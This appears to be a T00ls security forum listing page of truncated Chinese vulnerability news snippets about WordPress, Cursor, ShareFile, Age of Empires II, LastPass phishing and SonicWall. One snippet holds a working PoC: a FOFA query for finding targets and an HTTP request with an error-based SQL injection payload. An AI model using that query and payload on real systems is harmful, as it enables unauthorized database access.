匿名 HTTP 请求可在 WordPress 网站上执行任意代码。该漏洞存在于 WordPress 核心中,因此即使是未安装任何插件的默认安装环境,也会受到影响。在上周五之前,所有运行 WordPress 6.9 和 7.0 系列版本的网站均存在漏洞风险。随后,WordPress 发布了 6.9.5 和 7.0.2 两个安全更新,并通过其自动更新系统启动了官方所谓的 “ ...
网络安全公司 Mindgard 日前发布博客公开曝光 SpaceX 旗下的人工智能编码助手 Cursor 中存在的高危安全漏洞,该漏洞最早在 2025 年 12 月 15 日通报给 Cursor,但在经历 7 个月、多次邮件跟进、HackerOne 漏洞赏金项目流转以及超过 70 个 Cursor 版本更新后,漏洞仍然没有修复。 漏洞利用方式极其简单:该漏洞主要影响 Curs ...
Progress Software 已通知 ShareFile 客户关闭运行其存储区控制器的 Windows 服务器,并向《黑客新闻》确认,他们是在应对“可信的外部安全威胁”。公司已暂时禁用对受影响账户的访问,称此举“出于高度谨慎”,同时与内部和外部安全专家合作。它表示没有迹象表明有任何未经授权访问ShareFile账户或数据,并在得知威胁后通 ...
安全研究员 @RDJGR 日前在社交媒体上公布 CVE-2026-50663 漏洞的部分细节,该漏洞涉及经典即时战略游戏《帝国时代 II:决定版》,游戏中包含的远程代码执行漏洞利用方式并不难,而且攻击方式其实还是有些滑稽的,玩家只需要加入攻击者创建的游戏大厅即可自动触发漏洞。 漏洞详情如下:该漏洞本质上属于路径遍历问题,攻击者 ...
仿冒电子邮件被精心制作成类似于合法的公司通信,通知收件人更新的安全策略,并将他们定向到一个冒充DocuSign(一项电子签名服务)的登录页面,并声称提供一份文档供审查。LastPass强调,尽管攻击者使用的域名看起来像是合法的公司服务,但其系统并未遭到破坏,钓鱼邮件也并非来自其基础设施。从“hello@lastpassnewsletter ...
SonicWall 日前发布安全公告,警告用户攻击者正在利用 SMA1000 系列产品中的两个零日漏洞发起实际攻击,并敦促所有受影响的客户尽快安装最新发布的安全更新。此次涉及的漏洞分别为 CVE-2026-15409 和 CVE-2026-15410。其中,CVE-2026-15409 是一个 CVSS 评分为 10.0 的严重级服务器端请求伪造(SSRF)漏洞,存在于 SMA1000 ...
FOFA语法:body="/BJ_YT/src/main/webapp/login.jsp"Poc:GET /ffapi/../stAlarmInfo/list.do?stcd_query=1\'+and+1=updatexml(0x7e,concat(0x7e,(select+user())),0x7e)--+- HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X ...
根据《中华人民共和国网络安全法》,本站漏洞永不公开,若厂商想了解详情请咨询admin@t00ls.net!
T00ls.Com版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。
Copyright © 2008 - 2026 T00ls All Rights Reserved.